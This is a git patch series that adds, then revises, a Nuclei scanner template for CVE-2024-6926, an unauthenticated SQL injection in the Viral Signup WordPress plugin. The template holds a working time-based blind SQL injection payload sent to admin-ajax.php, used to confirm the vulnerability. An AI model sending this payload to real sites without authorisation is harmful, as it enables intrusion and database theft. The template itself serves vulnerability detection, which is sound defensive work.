From 29580141557056cc76b0610dd8ecbdd24d20d587 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Thu, 5 Sep 2024 15:59:48 +0300 Subject: [PATCH 1/3] add CVE-2024-6926 --- http/cves/2024/CVE-2024-6926.yaml | 54 +++++++++++++++++++++++++++++++ 1 file changed, 54 insertions(+) create mode 100644 http/cves/2024/CVE-2024-6926.yaml diff --git a/http/cves/2024/CVE-2024-6926.yaml b/http/cves/2024/CVE-2024-6926.yaml new file mode 100644 index 0000000000..a63bae4249 --- /dev/null +++ b/http/cves/2024/CVE-2024-6926.yaml @@ -0,0 +1,54 @@ +id: CVE-2024-6926 +info: + name: Viral Signup <= 2.1 - SQL Injection + author: s4e-io + severity: critical + description: | + The Viral Signup limited opt-in with viral refferal sharing plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 2.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-6926 + - https://www.usom.gov.tr/bildirim/tr-24-1387 + - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/viral-signup/viral-signup-21-unauthenticated-sql-injection + - https://wpscan.com/vulnerability/9ce96ce5-fcf0-4d7a-b562-f63ea3418d93/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-6926 + metadata: + vendor: viral-signup + product: viral-signup + framework: wordpress + publicwww-query: "/wp-content/plugins/viral-signup" + tags: cve,cve2024,wpscan,wp-plugin,wordpress,viral-signup + +flow: http(1) && http(2) + +http: + - raw: + - | + GET /wp-content/plugins/viral-signup/README.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(body,"Viral Signup")' + - 'status_code == 200' + condition: and + internal: true + + - raw: + - | + @timeout 20s + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + action=wow_signup_send_free&idsignup=(select*from(select(sleep(6)))a) + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'status_code == 200' + condition: and From fd913e7db6a619d0bb6133a9f541d12a51fdfa0d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 6 Sep 2024 17:23:33 +0530 Subject: [PATCH 2/3] Update CVE-2024-6926.yaml --- http/cves/2024/CVE-2024-6926.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-6926.yaml b/http/cves/2024/CVE-2024-6926.yaml index a63bae4249..e6f67bebc7 100644 --- a/http/cves/2024/CVE-2024-6926.yaml +++ b/http/cves/2024/CVE-2024-6926.yaml @@ -1,4 +1,5 @@ id: CVE-2024-6926 + info: name: Viral Signup <= 2.1 - SQL Injection author: s4e-io From e2c7c7467c69c7b99801989591cab77eba509cb8 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sun, 8 Sep 2024 22:35:05 +0400 Subject: [PATCH 3/3] updated matcher & req --- http/cves/2024/CVE-2024-6926.yaml | 11 +++++------ 1 file changed, 5 insertions(+), 6 deletions(-) diff --git a/http/cves/2024/CVE-2024-6926.yaml b/http/cves/2024/CVE-2024-6926.yaml index e6f67bebc7..744afc81c3 100644 --- a/http/cves/2024/CVE-2024-6926.yaml +++ b/http/cves/2024/CVE-2024-6926.yaml @@ -5,17 +5,18 @@ info: author: s4e-io severity: critical description: | - The Viral Signup limited opt-in with viral refferal sharing plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 2.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + The Viral Signup limited opt-in with viral referral sharing plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 2.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2024-6926 - https://www.usom.gov.tr/bildirim/tr-24-1387 - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/viral-signup/viral-signup-21-unauthenticated-sql-injection - https://wpscan.com/vulnerability/9ce96ce5-fcf0-4d7a-b562-f63ea3418d93/ + - https://nvd.nist.gov/vuln/detail/CVE-2024-6926 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-6926 metadata: + max-request: 2 vendor: viral-signup product: viral-signup framework: wordpress @@ -27,15 +28,13 @@ flow: http(1) && http(2) http: - raw: - | - GET /wp-content/plugins/viral-signup/README.txt HTTP/1.1 + GET / HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - - 'contains(body,"Viral Signup")' - - 'status_code == 200' - condition: and + - 'contains(body, "/wp-content/plugins/viral-signup")' internal: true - raw: